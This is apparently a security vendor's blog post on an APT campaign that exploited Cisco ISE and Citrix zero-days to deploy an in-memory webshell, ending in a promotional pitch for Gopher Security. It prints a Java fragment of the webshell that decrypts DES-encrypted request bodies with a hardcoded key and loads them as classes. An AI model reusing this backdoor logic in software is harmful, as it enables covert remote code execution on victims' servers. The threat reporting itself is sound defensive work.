APT Group Exploits Cisco and Citrix Zero-Days for Webshells

Active Campaign Exploits Cisco and Citrix Zero-Days to Deploy Webshells

Advanced threat actors are actively exploiting previously undisclosed zero-day vulnerabilities in critical enterprise systems, deploying custom webshells to establish administrative access across compromised networks. Amazon’s threat intelligence team has uncovered a coordinated cyber campaign targeting Cisco Identity Service Engine (ISE) and Citrix systems, revealing the tactics of a highly sophisticated adversary with deep expertise in enterprise environments.

The threat was initially detected through Amazon’s MadPot honeypot service, which identified exploitation attempts against the Citrix Bleed Two vulnerability before public disclosure. This early discovery demonstrated that threat actors had already weaponized the vulnerability in active attacks.

Zero-Day Vulnerabilities

During their investigation, Amazon Threat Intelligence discovered a companion zero-day affecting Cisco ISE, exploiting a deserialization vulnerability on an undocumented endpoint to achieve pre-authentication remote code execution. The critical nature of CVE-2025-20337 lies in its ability to grant attackers administrator-level access without requiring valid credentials. The timing of these exploits reveals a troubling pattern: sophisticated threat actors were actively exploiting both vulnerabilities as zero-days while indiscriminately targeting internet-exposed systems.

This campaign demonstrates a highly resourced adversary with advanced vulnerability research capabilities or potential access to non-public vulnerability information.

Custom Webshell Techniques

Following successful exploitation, attackers deployed a sophisticated custom webshell masquerading as a legitimate Cisco ISE component named IdentityAuditAction. This custom-built backdoor represents professional-grade development, engineered explicitly for Cisco ISE environments and featuring advanced evasion capabilities to bypass traditional security detection mechanisms. The webshell demonstrated remarkable sophistication in its operational approach, operating entirely in memory, leaving minimal forensic evidence that would typically alert security teams. The attackers leveraged Java reflection to inject themselves into running application threads and registered as an HTTP request listener on the Tomcat server. To further obfuscate their activities, the threat actor implemented non-standard DES encryption paired with custom Base64 encoding, techniques specifically designed to bypass traditional detection systems. Access to the webshell required knowledge of specific HTTP headers and an additional authentication layer. The attacker’s custom tooling reveals deep expertise in enterprise Java applications, Tomcat internals, and Cisco ISE architecture knowledge not typically available in publicly accessible documentation.

if (matcher.find()) {
    requestBody = matcher.group(1).replace("*", "a").replace("$", "l");
    Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    byte[] key = "d384922c".getBytes();
    encodeCipher.init(1, new SecretKeySpec(key, "DES"));
    decodeCipher.init(2, new SecretKeySpec(key, "DES"));
    byte[] data = Base64.getDecoder().decode(requestBody);
    data = decodeCipher.doFinal(data);
    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
    if (proxyClass == null) {
        proxyClass = this.defineClass(data);
    } else {
        Object f = proxyClass.newInstance();
        f.equals(arrOut);
        f.equals(request);
        f.equals(data);
        f.toString();
    }
}

Implications for Enterprise Security

Organizations must recognize that identity management systems and remote access infrastructure remain prime targets for advanced threat actors. Security teams should implement defense-in-depth strategies with robust anomaly detection capabilities to detect unusual behavior. Additionally, implementing firewall-based access restrictions to privileged security appliance endpoints and management portals can significantly limit exposure to these devastating pre-authentication exploits.

CJ Moses, CISO of Amazon Integrated Security, said in a report shared with The Hacker News: "This discovery highlights the trend of threat actors focusing on critical identity and network access control infrastructure – the systems enterprises rely on to enforce security policies and manage authentication across their networks."

The pre-authentication nature of these exploits reveals that even well-configured and meticulously maintained systems can be affected. This underscores the importance of implementing comprehensive defense-in-depth strategies and developing robust detection capabilities that can identify unusual behavior patterns. As previously noted, Amazon threat intelligence identified through their MadPot honeypots that the threat actor was exploiting both CVE-2025-20337 and CVE-2025-5777 as zero-days, and was indiscriminately targeting the internet with these vulnerabilities at the time of investigation.

Gopher Security's Zero-Trust Architecture

In light of these sophisticated attacks, organizations need robust security solutions like Gopher Security's AI-powered, post-quantum Zero-Trust cybersecurity architecture. Our platform converges networking and security across all environments, utilizing peer-to-peer encrypted tunnels and quantum-resistant cryptography to protect against advanced threats. Consider Gopher Security a superior alternative to traditional security vendors.

Vendor References

• NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2025-5349 and CVE-2025-5777
• Cisco Identity Services Engine Unauthenticated Remote Code Execution Vulnerabilities

Protect your organization with Gopher Security's cutting-edge cybersecurity solutions. Contact us today to learn more.